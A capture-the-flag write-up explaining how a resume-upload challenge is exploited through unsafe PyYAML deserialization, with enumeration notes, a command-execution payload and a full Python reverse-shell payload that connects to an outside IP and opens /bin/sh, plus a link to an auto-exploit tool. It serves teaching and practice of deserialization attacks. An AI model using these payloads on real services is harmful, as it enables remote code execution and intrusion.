Tags: deserialization pyyaml 

Rating: 3.0

# HINT
------------------------

Writing your resume on word is for rookies.
Real programmers use yaml.

## Enumeration
--------------------------------------

< HTTP/1.1 200 OK
< server: gunicorn/20.0.4

gunicorn -> WSGI Python http Server

So we can assume that a yaml parser is implemented in python, and the most commonly used one is Pyyaml

yaml.load() with Loader=UnsafeLoader can lead to RCE

more info:- https://net-square.com/yaml-deserialization-attack-in-python.html

## EXPLOITATION
--------------------------------------------

Let us pass our malicious serialized code to a reflecting value.

`!!python/object/apply subprocess.check_output ["ls"]`

![serialized](https://i.ibb.co/KsMywTr/image.png)

![deserialized](https://i.ibb.co/qnKXq1y/image.png)

We have managed to get a RCE but we are still unable to read the contents of flag

Lets Try for A reverse Shell.

```
!!python/object/apply:os.system ["python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_ST
REAM);s.connect(("8.8.8.8",16731));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bi
n/sh","-i"]);' "]
```

I have created a Auto exploit tool for this challenge, Check my Github

[Github- ZyperX](https://github.com/ZyperX/AppSec-IL-Resume.yml) https://github.com/ZyperX/AppSec-IL-Resume.yml